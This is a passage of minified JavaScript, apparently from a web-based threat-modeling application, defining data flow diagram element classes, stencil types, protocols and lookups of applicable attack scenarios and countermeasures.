InterfaceTop(e){this.Data.InterfaceTop=e,this.MobileAppInterfaceNameChanged.emit()}get InterfaceRight(){return this.Data.InterfaceRight}set InterfaceRight(e){this.Data.InterfaceRight=e,this.MobileAppInterfaceNameChanged.emit()}get InterfaceBottom(){return this.Data.InterfaceBottom}set InterfaceBottom(e){this.Data.InterfaceBottom=e,this.MobileAppInterfaceNameChanged.emit()}get InterfaceLeft(){return this.Data.InterfaceLeft}set InterfaceLeft(e){this.Data.InterfaceLeft=e,this.MobileAppInterfaceNameChanged.emit()}get Checklists(){let e=[];return this.Data.checklistIDs.forEach(i=>e.push(this.project.GetChecklist(i))),e}set Checklists(e){this.Data.checklistIDs=null==e?void 0:e.map(i=>i.ID)}CreateSoftwareStack(){return this.SoftwareStack||(this.SoftwareStack=this.project.CreateStack(zr.Software)),this.SoftwareStack}DeleteSoftwareStack(){this.project.DeleteStack(this.SoftwareStack)}CreateProcessStack(){return this.ProcessStack||(this.ProcessStack=this.project.CreateStack(zr.Process),this.project.Config.GetMyComponentPTypeGroups().forEach(e=>e.Types.forEach(i=>this.ProcessStack.AddChild(this.project.CreateComponent(i))))),this.ProcessStack}DeleteProcessStack(){this.project.DeleteStack(this.ProcessStack)}AddChecklist(e){this.Checklists.includes(e)||this.Data.checklistIDs.push(e.ID)}RemoveChecklist(e){this.Checklists.includes(e)&&this.Data.checklistIDs.splice(this.Data.checklistIDs.indexOf(e.ID),1)}GetAttackScenariosApplicable(){let e=[];this.project.GetAttackScenariosApplicable().filter(n=>n.ViewID==this.project.GetSysContext().ContextDiagram.ID).filter(n=>n.Targets.includes(this)).forEach(n=>e.push(n));let i=this.project.GetContextElementRefs().filter(n=>n.Ref.ID==this.ID).find(n=>{var r;return(null===(r=this.project.FindDiagramOfElement(n.ID))||void 0===r?void 0:r.ID)==this.project.GetSysContext().UseCaseDiagram.ID});return i&&this.project.GetAttackScenariosApplicable().filter(n=>n.ViewID==this.project.GetSysContext().UseCaseDiagram.ID).filter(n=>n.Targets.includes(i)).forEach(n=>e.push(n)),this.SoftwareStack&&e.push(...this.project.GetAttackScenariosApplicable().filter(n=>n.ViewID==this.SoftwareStack.ID)),this.ProcessStack&&e.push(...this.project.GetAttackScenariosApplicable().filter(n=>n.ViewID==this.ProcessStack.ID)),e}GetCountermeasuresApplicable(){let e=[];this.project.GetCountermeasuresApplicable().filter(n=>n.ViewID==this.project.GetSysContext().ContextDiagram.ID).filter(n=>n.Targets.includes(this)).forEach(n=>e.push(n));let i=this.project.GetContextElementRefs().filter(n=>n.Ref.ID==this.ID).find(n=>{var r;return(null===(r=this.project.FindDiagramOfElement(n.ID))||void 0===r?void 0:r.ID)==this.project.GetSysContext().UseCaseDiagram.ID});return i&&this.project.GetCountermeasuresApplicable().filter(n=>n.ViewID==this.project.GetSysContext().UseCaseDiagram.ID).filter(n=>n.Targets.includes(i)).forEach(n=>e.push(n)),this.SoftwareStack&&e.push(...this.project.GetCountermeasuresApplicable().filter(n=>n.ViewID==this.SoftwareStack.ID)),this.ProcessStack&&e.push(...this.project.GetCountermeasuresApplicable().filter(n=>n.ViewID==this.ProcessStack.ID)),e}FindReferences(e,i){let n=super.FindReferences(e,i);return this.SoftwareStack&&n.push({Type:li.DeleteStack,Param:this.SoftwareStack}),this.ProcessStack&&n.push({Type:li.DeleteStack,Param:this.ProcessStack}),this.AssetGroup&&n.push({Type:li.DeleteAssetGroup,Param:this.AssetGroup}),this.Checklists.forEach(r=>n.push({Type:li.DeleteChecklist,Param:r})),n}OnDelete(e,i){super.OnDelete(e,i),this.FindReferences(e,i).forEach(r=>{r.Type==li.DeleteDiagram?e.DeleteDiagram(r.Param):r.Type==li.DeleteStack?e.DeleteStack(r.Param):r.Type==li.DeleteAssetGroup?e.DeleteAssetGroup(r.Param):r.Type==li.DeleteChecklist&&e.DeleteChecklist(r.Param)})}initProperties(){super.initProperties(),this.AddProperty("properties.InterfaceTop","InterfaceTop","",!0,Ii.DevInterfaceName,!0),this.AddProperty("properties.InterfaceRight","InterfaceRight","",!0,Ii.DevInterfaceName,!0),this.AddProperty("properties.InterfaceBottom","InterfaceBottom","",!0,Ii.DevInterfaceName,!0),this.AddProperty("properties.InterfaceLeft","InterfaceLeft","",!0,Ii.DevInterfaceName,!0)}}return t.Icon="devices",t})();class wG extends os{constructor(a,e,i){super(a,Aa.ExternalEntity,e,i)}}class Ts extends os{get diagramID(){var a;return null===(a=this.project.FindDiagramOfElement(this.Ref.ID))||void 0===a?void 0:a.ID}get Name(){var a;return(null===(a=this.Ref)||void 0===a?void 0:a.GetProperty("Name"))+"-Reference"}set Name(a){this.Ref&&(this.Ref.Name=a)}get Ref(){var a;return null===(a=this.project)||void 0===a?void 0:a.GetContextElement(this.Data.refID)}set Ref(a){this.Data.refID=a.ID,this.rerouteEvents()}constructor(a,e,i,n){super(a,e,i,n),this.rerouteEvents()}GetProperty(a){return"Ref"==a?this.Ref:"diagramID"==a?this.diagramID:this.Ref.GetProperty(a)}SetProperty(a,e){this.Ref.SetProperty(a,e)}initProperties(){super.initProperties(),this.AddProperty("properties.GoToRef","diagramID","",!0,Ii.DiagramReference,!1)}rerouteEvents(){!this.Ref||(this.Ref.NameChanged.subscribe(a=>this.NameChanged.emit(a)),this.Ref.DataChanged.subscribe(a=>this.DataChanged.emit(a)))}static InstantiateRef(a,e,i){if(a instanceof sf)return Bg.InstantiateRef(a,e,i);let n=new Ts({},a.Type,e,i);return n.Ref=a,n.Data.Name="Reference to "+a.ID,n}}class Bg extends sf{get diagramID(){return this.project.FindDiagramOfElement(this.Ref.ID).ID}get Name(){var a;return(null===(a=this.Ref)||void 0===a?void 0:a.GetProperty("Name"))+"-Reference"}set Name(a){this.Ref&&(this.Ref.Name=a)}get Ref(){var a;return null===(a=this.project)||void 0===a?void 0:a.GetContextElement(this.Data.refID)}set Ref(a){this.Data.refID=a.ID,this.rerouteEvents()}constructor(a,e,i){super(a,e,i),this.project=e,this.rerouteEvents()}GetProperty(a){return"Ref"==a?this.Ref:"diagramID"==a?this.diagramID:this.Ref.GetProperty(a)}SetProperty(a,e){this.Ref.SetProperty(a,e)}initProperties(){super.initProperties(),this.AddProperty("properties.GoToRef","diagramID","",!0,Ii.DiagramReference,!1)}rerouteEvents(){!this.Ref||(this.Ref.NameChanged.subscribe(a=>this.NameChanged.emit(a)),this.Ref.DataChanged.subscribe(a=>this.DataChanged.emit(a)),this.Ref.OutOfScopeChanged.subscribe(a=>this.OutOfScopeChanged.emit(a)))}static InstantiateRef(a,e,i){let n=new Bg({},e,i);return n.Ref=a,n.Data.Name="Reference to "+a.ID,n}}var Et=(()=>{return(t=Et||(Et={}))[t.None=0]="None",t[t.LogProcessing=11]="LogProcessing",t[t.PhyProcessing=12]="PhyProcessing",t[t.LogDataStore=21]="LogDataStore",t[t.PhyDataStore=22]="PhyDataStore",t[t.LogExternalEntity=31]="LogExternalEntity",t[t.PhyExternalEntity=32]="PhyExternalEntity",t[t.DataFlow=41]="DataFlow",t[t.PhysicalLink=51]="PhysicalLink",t[t.Interface=61]="Interface",t[t.LogTrustArea=71]="LogTrustArea",t[t.PhyTrustArea=72]="PhyTrustArea",Et;var t})();class Sc{static Constructor(a){switch(a){case Et.LogTrustArea:return Up;case Et.PhyTrustArea:return Gg;case Et.LogProcessing:return Vp;case Et.PhyProcessing:return Hg;case Et.LogDataStore:return Bp;case Et.PhyDataStore:return Ug;case Et.LogExternalEntity:return Hp;case Et.PhyExternalEntity:return qg;case Et.DataFlow:return rs;case Et.PhysicalLink:return lf;case Et.Interface:return Nu;default:return console.error("Missing Element Type in ElementTypeUtil.Constructor()",a),null}}static GetPhyiscalID(a){switch(a){case Et.LogDataStore:return Et.PhyDataStore;case Et.LogProcessing:return Et.PhyProcessing;case Et.LogExternalEntity:return Et.PhyExternalEntity;case Et.LogTrustArea:return Et.PhyTrustArea;default:return null}}static GetTypes(){return[Et.LogProcessing,Et.PhyProcessing,Et.LogDataStore,Et.PhyDataStore,Et.LogExternalEntity,Et.PhyExternalEntity,Et.LogTrustArea,Et.PhyTrustArea,Et.DataFlow,Et.PhysicalLink,Et.Interface]}static Icon(a){switch(a){case Et.LogTrustArea:return Up.Icon;case Et.PhyTrustArea:return Gg.Icon;case Et.LogProcessing:return Vp.Icon;case Et.PhyProcessing:return Hg.Icon;case Et.LogDataStore:return Bp.Icon;case Et.PhyDataStore:return Ug.Icon;case Et.LogExternalEntity:return Hp.Icon;case Et.PhyExternalEntity:return qg.Icon;case Et.DataFlow:return rs.Icon;case Et.PhysicalLink:return lf.Icon;case Et.Interface:return Nu.Icon;default:return console.error("Missing Element Type in ElementTypeUtil.Icon()",a),null}}static IsPhysical(a){switch(a){case Et.None:case Et.LogTrustArea:return!1;case Et.PhyTrustArea:return!0;case Et.LogProcessing:return!1;case Et.PhyProcessing:return!0;case Et.LogDataStore:return!1;case Et.PhyDataStore:return!0;case Et.LogExternalEntity:return!1;case Et.PhyExternalEntity:return!0;case Et.DataFlow:return!1;case Et.PhysicalLink:case Et.Interface:return!0;default:return console.error("Missing Element Type in ElementTypeUtil.IsPhysical()",a),null}}static ToString(a){switch(a){case Et.LogTrustArea:return"Logical Trust Area";case Et.PhyTrustArea:return"Physical Trust Area";case Et.LogProcessing:return"Logical Process";case Et.PhyProcessing:return"Physical Processor";case Et.LogDataStore:return"Logical Data Store";case Et.PhyDataStore:return"Physical Data Store";case Et.LogExternalEntity:return"Logical External Entity";case Et.PhyExternalEntity:return"Physical External Entity";case Et.DataFlow:return"Data Flow";case Et.PhysicalLink:return"Physical Link";case Et.Interface:return"Interface";default:return console.error("Missing Element Type in ElementTypeUtil.ToString()",a),null}}}class oM extends Ln{constructor(a,e){super(a),this.config=e,this.Data.IsDefault||(this.Data.IsDefault=!1),this.Properties||(this.Properties=[])}get ElementTypeID(){return this.Data.ElementTypeID}set ElementTypeID(a){this.Data.ElementTypeID=a}get IsDefault(){return this.Data.IsDefault}set IsDefault(a){this.Data.IsDefault=a}get Properties(){return this.Data.Properties}set Properties(a){this.Data.Properties=a}get PropertyOverwrites(){return this.Data.PropertyOverwrites}set PropertyOverwrites(a){this.Data.PropertyOverwrites=a}get TemplateDFD(){return this.config.GetStencilTypeTemplate(this.Data.templateDFDID)}set TemplateDFD(a){this.Data.templateDFDID=null==a?void 0:a.ID}FindReferences(a,e){let i=[];return null==a||a.GetDFDElements().filter(n=>n.GetProperty("Type").ID==this.ID).forEach(n=>i.push({Type:li.ResetStencilType,Param:n})),e.GetThreatRules().filter(n=>{var r;return n.RuleType==on.Stencil&&(null===(r=n.StencilRestriction)||void 0===r?void 0:r.stencilTypeID)==this.ID}).forEach(n=>i.push({Type:li.DeleteThreatRule,Param:n})),i}OnDelete(a,e){let i=this.FindReferences(a,e),n=e.GetStencilTypes().find(r=>r.IsDefault&&r.ElementTypeID==this.ElementTypeID);i.forEach(r=>{r.Type==li.ResetStencilType?r.Param.SetProperty("Type",n):r.Type==li.DeleteThreatRule&&e.DeleteThreatRule(r.Param)})}static FromJSON(a,e){return new oM(a,e)}}class rM extends Ln{constructor(a,e){super(a),this.config=e,this.ListInHWDiagram||(this.ListInHWDiagram=!0),this.ListInElementTypeIDs||(this.ListInElementTypeIDs=[]),this.Layout||(this.Layout=[]),this.Data.stencilTypeIDs||(this.Data.stencilTypeIDs=[]),null==this.CanEditInWhichDiagram&&(this.CanEditInWhichDiagram=!0)}get CanEditInWhichDiagram(){return this.Data.CanEditInWhichDiagram}set CanEditInWhichDiagram(a){this.Data.CanEditInWhichDiagram=a}get ListInHWDiagram(){return this.Data.ListInHWDiagram}set ListInHWDiagram(a){this.Data.ListInHWDiagram=a}get ListInUCDiagram(){return this.Data.ListInUCDiagram}set ListInUCDiagram(a){this.Data.ListInUCDiagram=a}get ListInElementTypeIDs(){return this.Data.ListInElementTypeIDs}set ListInElementTypeIDs(a){this.Data.ListInElementTypeIDs=a}get StencilTypes(){return this.config.GetStencilTypes().filter(a=>this.Data.stencilTypeIDs.includes(a.ID))}set StencilTypes(a){for(this.Data.stencilTypeIDs=a.map(e=>e.ID);this.Layout.length<a.length;)this.Layout.push({name:null,x:0,y:0,canEditSize:!1,width:0,height:0});for(;this.Layout.length>a.length;)this.Layout.pop();for(let e=0;e<a.length;e++)this.Layout[e].canEditSize=a[e].ElementTypeID==Et.LogTrustArea||a[e].ElementTypeID==Et.PhyTrustArea,this.Layout[e].name=a[e].Name}get Layout(){return this.Data.Layout}set Layout(a){this.Data.Layout=a}FindReferences(a,e){let i=[];return e.GetStencilTypes().filter(n=>n.TemplateDFD==this).forEach(n=>{i.push({Type:li.RemoveStencilTypeTemplateFromStencilType,Param:this})}),i}OnDelete(a,e){this.FindReferences(a,e).forEach(n=>{n.Type==li.RemoveStencilTypeTemplateFromStencilType&&(n.Param.TemplateDFD=null)})}static FromJSON(a,e){return new rM(a,e)}}class sM extends Ln{constructor(a,e){super(a),this.config=e,null==this.Data.Letters&&(this.Letters=[])}get Letters(){return this.Data.Letters}set Letters(a){this.Data.Letters=a}GetThreatCategory(a){return this.config.GetThreatCategory(a.threatCategoryID)}FindReferences(a,e){let i=[];return null==a||a.GetAttackScenarios().filter(n=>{var r;return(null===(r=n.ThreatRule)||void 0===r?void 0:r.ID)==this.ID}).forEach(n=>{i.push({Type:li.DeleteAttackScenario,Param:n})}),i}OnDelete(a,e){this.FindReferences(a,e).forEach(n=>{n.Type==li.DeleteAttackScenario&&a.DeleteAttackScenario(n.Param)})}static FromJSON(a,e){return new sM(a,e)}}class lc extends Np{constructor(a,e,i,n){var r;super(a),this.TypeChanged=new Tt,this.PhysicalElementChanged=new Tt,this.project=i,this.config=n,this.Type=e,0==(null===(r=this.Name)||void 0===r?void 0:r.length)&&(this.Name=i?Gi.FindUniqueName(e.Name,i.GetDFDElements().map(c=>c.Name)):null==e?void 0:e.Name),this.Data.IsPhyiscal||(this.Data.IsPhyiscal=Sc.IsPhysical(e.ElementTypeID)),!this.IsPhysical&&e.ElementTypeID!=Et.DataFlow&&this.AddProperty("properties.PhysicalElement","PhysicalElement","properties.PhysicalElement.tt",!0,Ii.PhysicalElementSelect,!0)}get Type(){return this.config.GetStencilType(this.Data.typeID)}set Type(a){if(this.setTypeProperties(a,this.Type),a)this.Data.typeID=a.ID;else{const e=this.config.GetStencilTypes().find(i=>i.IsDefault&&i.ElementTypeID==this.Data.ElementTypeID);this.Data.typeID=e?e.ID:null}this.TypeChanged.emit(a)}get Parent(){return this.project.GetDFDElement(this.Data.parentID)||null}set Parent(a){this.Parent&&this.Parent.ID!=a.ID&&this.Parent.RemoveChild(this),this.Data.parentID=a.ID}get IsPhysical(){return this.Data.IsPhyiscal}get PhysicalElement(){return this.project.GetDFDElement(this.Data.physicalElementID)}set PhysicalElement(a){this.Data.physicalElementID=null==a?void 0:a.ID,this.PhysicalElementChanged.emit(a)}FindReferences(a,e){let i=super.FindReferences(a,e);return null==a||a.GetDFDElementRefs().filter(n=>n.Ref.ID==this.ID).forEach(n=>i.push({Type:li.DeleteElementReferences,Param:n})),this instanceof Ys&&i.push({Type:li.MoveChildElements,Param:this.Parent}),this.IsPhysical&&(null==a||a.GetDFDElements().filter(n=>{var r;return(null===(r=n.PhysicalElement)||void 0===r?void 0:r.ID)==this.ID}).forEach(n=>i.push({Type:li.RemovePhysicalElementReference,Param:n}))),null==a||a.GetDFDElements().filter(n=>{var r,c;return n instanceof rs&&[null===(r=n.Sender)||void 0===r?void 0:r.ID,null===(c=n.Receiver)||void 0===c?void 0:c.ID].includes(this.ID)}).forEach(n=>i.push({Type:li.DeleteDataFlow,Param:n})),this instanceof Nu&&(null==a||a.GetDFDElements().filter(n=>{var r,c;return n instanceof rs&&[null===(r=n.SenderInterface)||void 0===r?void 0:r.ID,null===(c=n.ReceiverInterface)||void 0===c?void 0:c.ID].includes(this.ID)}).forEach(n=>i.push({Type:li.RemoveInterfaceReference,Param:n}))),i}OnDelete(a,e){super.OnDelete(a,e),null!=this.Parent&&this.Parent.RemoveChild(this),this.FindReferences(a,e).forEach(n=>{var r,c;if(n.Type==li.DeleteElementReferences)a.DeleteDDFElement(n.Param);else if(n.Type==li.MoveChildElements&&this instanceof Ys)this.GetChildren().forEach(d=>this.Parent.AddChild(d));else if(n.Type==li.RemovePhysicalElementReference)n.Param.PhysicalElement=null;else if(n.Type==li.RemoveInterfaceReference){let d=n.Param;(null===(r=d.SenderInterface)||void 0===r?void 0:r.ID)==this.ID&&(d.SenderInterface=null),(null===(c=d.ReceiverInterface)||void 0===c?void 0:c.ID)==this.ID&&(d.ReceiverInterface=null)}else n.Type==li.DeleteDataFlow?a.DeleteDDFElement(n.Param):n.Type==li.DeleteAttackScenario&&a.DeleteAttackScenario(n.Param)})}static Instantiate(a,e,i){return new(Sc.Constructor(a.ElementTypeID))({},a,e,i)}static FromJSON(a,e,i){let n,r=i.GetStencilType(a.typeID);if(a.refID)n=e.GetDFDElement(a.refID)instanceof Ys?new zm(a,r,e,i):new td(a,r,e,i);else if(a.ElementTypeID==Et.LogTrustArea)n=new Up(a,r,e,i);else if(a.ElementTypeID==Et.PhyTrustArea)n=new Gg(a,r,e,i);else if(a.ElementTypeID==Et.LogProcessing)n=new Vp(a,r,e,i);else if(a.ElementTypeID==Et.PhyProcessing)n=new Hg(a,r,e,i);else if(a.ElementTypeID==Et.LogDataStore)n=new Bp(a,r,e,i);else if(a.ElementTypeID==Et.PhyDataStore)n=new Ug(a,r,e,i);else if(a.ElementTypeID==Et.LogExternalEntity)n=new Hp(a,r,e,i);else if(a.ElementTypeID==Et.PhyExternalEntity)n=new qg(a,r,e,i);else if(a.ElementTypeID==Et.DataFlow)n=new rs(a,r,e,i);else if(a.ElementTypeID==Et.PhysicalLink)n=new lf(a,r,e,i);else if(a.ElementTypeID==Et.Interface)n=new Nu(a,r,e,i);else{if(a.ElementTypeID!=Et.None)throw new Error("Unknown ElementTypeID: "+a.ElementTypeID);n=new Ys(a,r,e,i)}return n}initProperties(){super.initProperties(),this.AddProperty("properties.Type","Type","",!0,Ii.StencilType,!0)}setTypeProperties(a,e){let i=null;if(a&&(i=this.config.GetStencilElementType(a),!a.IsDefault&&i&&i.Properties&&i.Properties.forEach(n=>{var r;this.AddProperty(null==n.DisplayName?n.ID:n.DisplayName,n.ID,n.Tooltip,!1,n.Type,n.Editable);let c=null===(r=a.PropertyOverwrites)||void 0===r?void 0:r.find(d=>d.Key==n.ID);c?n.HasGetter?this[n.ID]=c.Value:this.Data[n.ID]=c.Value:n.HasGetter&&null==this[n.ID]?this[n.ID]=n.DefaultValue:!n.HasGetter&&null==this.Data[n.ID]&&(this.Data[n.ID]=n.DefaultValue)}),a.Properties&&a.Properties.forEach(n=>{this.AddProperty(null==n.DisplayName?n.ID:n.DisplayName,n.ID,n.Tooltip,n.HasGetter,n.Type,n.Editable);try{n.HasGetter&&null==this[n.ID]?this[n.ID]=n.DefaultValue:null==this.Data[n.ID]&&(this.Data[n.ID]=n.DefaultValue)}catch(r){}})),e&&e.Properties&&a.Properties){let n=a.Properties.map(r=>r.ID);i&&n.push(...i.Properties.map(r=>r.ID)),e.Properties.filter(r=>!n.includes(r.ID)).forEach(r=>{delete this.Data[r.ID]})}}}class td extends lc{get diagramID(){return this.project.FindDiagramOfElement(this.Ref.ID).ID}get Name(){var a;return(null===(a=this.Ref)||void 0===a?void 0:a.GetProperty("Name"))+"-Reference"}set Name(a){this.Ref&&(this.Ref.Name=a)}get Ref(){var a;return null===(a=this.project)||void 0===a?void 0:a.GetDFDElement(this.Data.refID)}set Ref(a){this.Data.refID=a.ID,this.rerouteEvents()}constructor(a,e,i,n){super(a,e,i,n),this.project=i,this.config=n,this.rerouteEvents()}GetProperty(a){return"Ref"==a?this.Ref:"diagramID"==a?this.diagramID:"OutOfScope"==a?this.OutOfScope:this.Ref.GetProperty(a)}SetProperty(a,e){"OutOfScope"==a?this.OutOfScope=e:this.Ref.SetProperty(a,e)}initProperties(){super.initProperties(),this.AddProperty("properties.GoToRef","diagramID","",!0,Ii.DiagramReference,!1)}rerouteEvents(){!this.Ref||(this.Ref.NameChanged.subscribe(a=>this.NameChanged.emit(a)),this.Ref.DataChanged.subscribe(a=>this.DataChanged.emit(a)),this.Ref.TypeChanged.subscribe(a=>this.TypeChanged.emit(a)),this.Ref.OutOfScopeChanged.subscribe(a=>this.OutOfScopeChanged.emit(a)))}static InstantiateRef(a,e,i){if(a instanceof Ys)return zm.InstantiateRef(a,e,i);let n=new td({},a.Type,e,i);return n.Ref=a,n.Data.Name="Reference to "+a.ID,n}}class v2 extends lc{get ProcessedData(){var a;let e=[];return null===(a=this.Data.ProcessedDataIDs)||void 0===a||a.forEach(i=>e.push(this.project.GetMyData(i))),e}set ProcessedData(a){this.Data.ProcessedDataIDs=null==a?void 0:a.map(e=>e.ID),a&&a.length>0&&(this.ProcessedDataSensitivity=Math.max(...a.map(e=>e.Sensitivity)))}get ProcessedDataSensitivity(){return this.Data.ProcessedDataSensitivity}set ProcessedDataSensitivity(a){this.Data.ProcessedDataSensitivity=a}constructor(a,e,i,n){super(a,e,i,n),this.Data.ProcessedDataIDs||(this.Data.ProcessedDataIDs=[])}initProperties(){super.initProperties(),this.AddProperty("properties.ProcessedData","ProcessedData","properties.ProcessedData.tt",!0,Ii.MyDataSelect,!0),this.AddProperty("properties.ProcessedDataSensitivity","ProcessedDataSensitivity","properties.ProcessedDataSensitivity.tt",!0,Ii.LowMediumHighSelect,!0,dr.Medium)}}let IG=(()=>{class t extends v2{}return t.Icon="memory",t})();class Vp extends IG{constructor(a,e,i,n){super(a,e,i,n),this.Data.ElementTypeID=Et.LogProcessing}static GetDefaultType(a){let e=a.GetStencilTypes().find(i=>i.IsDefault&&i.ElementTypeID==Vp.ElementTypeID);return e||(e=a.CreateStencilType(Vp.ElementTypeID),e.Name="Process",e.IsDefault=!0),e}}Vp.ElementTypeID=Et.LogProcessing;class Hg extends IG{constructor(a,e,i,n){super(a,e,i,n),this.Data.ElementTypeID=Et.PhyProcessing}static GetDefaultType(a){let e=a.GetStencilTypes().find(i=>i.IsDefault&&i.ElementTypeID==Hg.ElementTypeID);return e||(e=a.CreateStencilType(Hg.ElementTypeID),e.Name="Processor",e.IsDefault=!0),e}}Hg.ElementTypeID=Et.PhyProcessing;let RG=(()=>{class t extends v2{}return t.Icon="sd_card",t})();class Bp extends RG{constructor(a,e,i,n){super(a,e,i,n),this.Data.ElementTypeID=Et.LogDataStore}static GetDefaultType(a){let e=a.GetStencilTypes().find(i=>i.IsDefault&&i.ElementTypeID==Bp.ElementTypeID);return e||(e=a.CreateStencilType(Bp.ElementTypeID),e.Name="Data Store",e.IsDefault=!0),e}}Bp.ElementTypeID=Et.LogDataStore;class Ug extends RG{constructor(a,e,i,n){super(a,e,i,n),this.Data.ElementTypeID=Et.PhyDataStore}static GetDefaultType(a){let e=a.GetStencilTypes().find(i=>i.IsDefault&&i.ElementTypeID==Ug.ElementTypeID);return e||(e=a.CreateStencilType(Ug.ElementTypeID),e.Name="Phy Data Store",e.IsDefault=!0),e}}Ug.ElementTypeID=Et.PhyDataStore;let SG=(()=>{class t extends v2{}return t.Icon="cloud",t})();class Hp extends SG{constructor(a,e,i,n){super(a,e,i,n),this.Data.ElementTypeID=Et.LogExternalEntity}static GetDefaultType(a){let e=a.GetStencilTypes().find(i=>i.IsDefault&&i.ElementTypeID==Hp.ElementTypeID);return e||(e=a.CreateStencilType(Hp.ElementTypeID),e.Name="Ext. Entity",e.IsDefault=!0),e}}Hp.ElementTypeID=Et.LogExternalEntity;class qg extends SG{constructor(a,e,i,n){super(a,e,i,n),this.Data.ElementTypeID=Et.PhyExternalEntity}static GetDefaultType(a){let e=a.GetStencilTypes().find(i=>i.IsDefault&&i.ElementTypeID==qg.ElementTypeID);return e||(e=a.CreateStencilType(qg.ElementTypeID),e.Name="Phy Ext. Entity",e.IsDefault=!0),e}}qg.ElementTypeID=Et.PhyExternalEntity;class lf extends v2{constructor(a,e,i,n){super(a,e,i,n),this.Data.ElementTypeID=Et.PhysicalLink}static GetDefaultType(a){let e=a.GetStencilTypes().find(i=>i.IsDefault&&i.ElementTypeID==lf.ElementTypeID);return e||(e=a.CreateStencilType(lf.ElementTypeID),e.Name="Physical Link",e.IsDefault=!0),e}}lf.Icon="precision_manufacturing",lf.ElementTypeID=Et.PhysicalLink;class Nu extends v2{constructor(a,e,i,n){super(a,e,i,n),this.Data.ElementTypeID=Et.Interface}static GetDefaultType(a){let e=a.GetStencilTypes().find(i=>i.IsDefault&&i.ElementTypeID==Nu.ElementTypeID);return e||(e=a.CreateStencilType(Nu.ElementTypeID),e.Name="Interface",e.IsDefault=!0),e}}Nu.Icon="sync_alt",Nu.ElementTypeID=Et.Interface;class Lu extends Ln{constructor(a,e){super(a),this.config=e,null==this.Data.IsDefault&&(this.Data.IsDefault=!1),this.Properties||(this.Properties=[])}static GetDefaultType(a){let e=a.GetProtocols().find(i=>i.IsDefault);return e||(e=a.CreateProtocol(),e.Name="Protocol",e.IsDefault=!0),e}get IsDefault(){return this.Data.IsDefault}set IsDefault(a){this.Data.IsDefault=a}get Properties(){return this.Data.Properties}set Properties(a){this.Data.Properties=a}get PropertyOverwrites(){return this.Data.PropertyOverwrites}set PropertyOverwrites(a){this.Data.PropertyOverwrites=a}GetProperty(a){var e;let i=this.Properties.find(n=>n.ID==a);if(!i&&!this.IsDefault&&(i=Lu.GetDefaultType(this.config).Properties.find(n=>n.ID==a)),i){if(!this.IsDefault){let n=null===(e=this.PropertyOverwrites)||void 0===e?void 0:e.find(r=>r.Key==a);if(n)return n.Value}return i.DefaultValue}return super.GetProperty(a)}SetProperty(a,e){console.log("Protocol set property"),super.SetProperty(a,e)}FindReferences(a,e){let i=[];return e.GetStencilTypes().filter(n=>n.ElementTypeID==Et.DataFlow).forEach(n=>{var r;let c=null===(r=n.PropertyOverwrites)||void 0===r?void 0:r.find(d=>"ProtocolStack"==d.Key);c&&c.Value.includes(this.ID)&&i.push({Type:li.RemoveFromStencilProtocolStack,Param:n})}),null==a||a.GetDFDElements().filter(n=>n.Type.ElementTypeID==Et.DataFlow).filter(n=>n.ProtocolStack.includes(this)).forEach(n=>{i.push({Type:li.RemoveFromElementProtocolStack,Param:n})}),i}OnDelete(a,e){return this.FindReferences(a,e).forEach(n=>{if(n.Type==li.RemoveFromStencilProtocolStack){let r=n.Param.PropertyOverwrites.find(c=>c.Key==this.ID);n.Param.PropertyOverwrites.splice(n.Param.PropertyOverwrites.indexOf(r),1)}else n.Type==li.RemoveFromElementProtocolStack&&n.Param.ProtocolStack.splice(n.Param.ProtocolStack.indexOf(this),1)}),!0}static FromJSON(a,e){return new Lu(a,e)}}class rs extends lc{constructor(a,e,i,n){super(a,e,i,n),this.protocolProperties=[],this.LineTypeChanged=new Tt,this.ArrowPosChanged=new Tt,this.BendFlowChanged=new Tt,this.DirectionChanged=new Tt,this.AnchorChanged=new Tt,this.Data.ElementTypeID=Et.DataFlow,this.Data.protocolStackIDs||(this.Data.protocolStackIDs=[]),null==this.OverwriteProtocolProperties&&(this.OverwriteProtocolProperties=!1),this.Data.ProcessedDataIDs||(this.Data.ProcessedDataIDs=[]),this.OverwriteDataProperties=null!=this.Data.OverwriteDataProperties&&this.OverwriteDataProperties,null==this.Data.ShowName&&(this.ShowName=!0),null==this.Data.ShowProtocolDetails&&(this.ShowProtocolDetails=!0),null==this.Data.LineType&&(this.LineType=ed.Solid),null==this.Data.ArrowPos&&(this.ArrowPos=wn.End),Lu.GetDefaultType(this.config).Properties.forEach(r=>{let c=this.AddProperty(r.DisplayName,r.ID,r.Tooltip,r.HasGetter,r.Type,!1,r.DefaultValue);this.protocolProperties.push(r.ID),c.Editable=this.OverwriteProtocolProperties})}static GetDefaultType(a){let e=a.GetStencilTypes().find(i=>i.IsDefault&&i.ElementTypeID==rs.ElementTypeID);return e||(e=a.CreateStencilType(rs.ElementTypeID),e.Name="Data Flow",e.IsDefault=!0,e.AddProperty("Overwrite Data","OverwriteDataProperties","By default, processed data and data sensitivity are referenced from sender. Overwrite to set them manually",!0,Ii.CheckBox,!0),e.AddProperty("Processed Data","ProcessedData","Data that the element processes, stores, produces, or receives",!0,Ii.MyDataSelect,!0),e.AddProperty("Data Sensitivity","ProcessedDataSensitivity","Sensitivity of the processed data",!0,Ii.LowMediumHighSelect,!0,dr.Medium),e.AddProperty("Overwrite Stack","OverwriteProtocolProperties","Use either the properties derived from the protocols or define them manually",!0,Ii.CheckBox,!0),e.AddProperty("Protocol Stack","ProtocolStack","List of protocols used within the communication",!0,Ii.ProtocolSelect,!0)),e}get Sender(){return this.project.GetDFDElement(this.Data.senderID)}set Sender(a){this.Data.senderID=a.ID}get Receiver(){return this.project.GetDFDElement(this.Data.receiverID)}set Receiver(a){this.Data.receiverID=null==a?void 0:a.ID}get SenderInterface(){return this.project.GetDFDElement(this.Data.senderInterfaceID)}set SenderInterface(a){this.Data.senderInterfaceID=null==a?void 0:a.ID,this.NameChanged.emit(this.GetProperty("Name"))}get ReceiverInterface(){return this.project.GetDFDElement(this.Data.receiverInterfaceID)}set ReceiverInterface(a){this.Data.receiverInterfaceID=null==a?void 0:a.ID,this.NameChanged.emit(this.GetProperty("Name"))}get OverwriteProtocolProperties(){return this.Data.OverwriteProtocolProperties}set OverwriteProtocolProperties(a){var e;this.Data.OverwriteProtocolProperties=a,null===(e=this.protocolProperties)||void 0===e||e.forEach(i=>{this.GetProperties().find(n=>i==n.ID).Editable=a})}get ProtocolStack(){let a=[];return this.Data.protocolStackIDs.forEach(e=>a.push(this.config.GetProtocol(e))),a}set ProtocolStack(a){this.Data.protocolStackIDs=null==a?void 